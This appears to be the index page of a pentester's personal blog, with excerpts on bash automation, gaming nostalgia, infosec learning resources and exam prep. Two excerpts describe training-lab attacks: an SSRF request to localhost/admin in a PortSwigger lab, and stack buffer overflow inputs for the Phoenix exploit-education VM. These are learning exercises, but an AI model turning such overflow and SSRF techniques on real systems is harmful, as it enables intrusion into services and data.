bunthut
Automate the boring stuff with bash
I really start to love bash. And dislike python. I’m not good at both, but I like to automate boring, repetitive tasks. Being a pentester and network admin using Linux (of course), I’m working a lot in the shell, editing config files, checking network devices and such things. I encounter a lot of problems which …
UO is free to play
When I was 13 years old I was discovering multiplayer games. That was at the end of the 90s, and Internet was still very expensive and usually paid by the minute. You gotta dial up your 56k modem and occupy your family’s phone line. That made internet cafes popular and by the time a new …
Ransomware in 1992
The German “Die Drei Fragezeichen” (The three ???, a fictional detective trio from a German audio drama for kids, which is popular among adults nowadays) investigated a floppy-disk-driven malware attack in the episode 056/Angriff der Computer-Viren (Attack of the computer viruses). Funnily, the whole threat model is heavily reminiscent of today’s ransomware. The three …
Wanna learn? tryhackme.com.
I recently discovered tryhackme.com and I am so stunned by the awesome material. You won’t need any other site to learn pentesting anymore and it’s mostly free. It’s FULL of vulnerable boxes you can spin up in the cloud privately, with and without walkthroughs. Pure awesomeness…
Learning SSRF with Portswigger Labs
Basic SSRF against the local server: https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost When accessing a product page, a “check stock” link checks the stock through an API on some URL. We just need to change the URL to localhost/admin, where we can see user delete links, and here we go with the request to delete that carlos: POST /product/stock HTTP/1.1 …
The Big and Dandy "How to get into Infosec" Resources Post 2020
On a daily basis and on all hacking oriented communities, people ask how to start or to get into Infosec. I decided to maintain a post where I collect my resources regarding (beginner) learning resources. I have been learning towards an infosec position for a while now and I am now a junior pentester at a …
FiSi Exam Preparation
I have decided to collect my exam preparation online; I think I will always cover small topics as a post. As usual, the information is incomplete and tailored only to my needs. But maybe someone can use it. Trying to be IHK compliant. Resources: Project management: https://www.inloox.de/unternehmen/blog/artikel/einfuehrung-ins-pm-10-was-ist-ein-netzplan/ Economics: https://www.bpb.de/nachschlagen/lexika/lexikon-der-wirtschaft/20309/preisbildung https://www.unternehmerlexikon.de/preisbildung/
WriteUp: Phoenix Exploit.Education
Writeup for the Phoenix VM from http://exploit.education/phoenix/.
stack-one: python -c 'print 64*"A"'
stack-two: export ExploitEducation=$"cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc\n\t\n\r"
Learned about endianness here. Really missing some of the basic computer science stuff, but well, coming to it…
stack-three:
user@phoenix-amd64:/opt/phoenix/amd64$ objdump stack-three -x | grep level
user@phoenix-amd64:/opt/phoenix/amd64$ python -c 'print "c"*64+"\x9d\x06@"' | ./stack-three
Welcome to phoenix/stack-three, brought to you by https://exploit.education
calling function …
Netflix: No more support for Firefox 60.8.0esr
Update (way later): Firefox was updated to 68something in Debian on the next day. <3 debian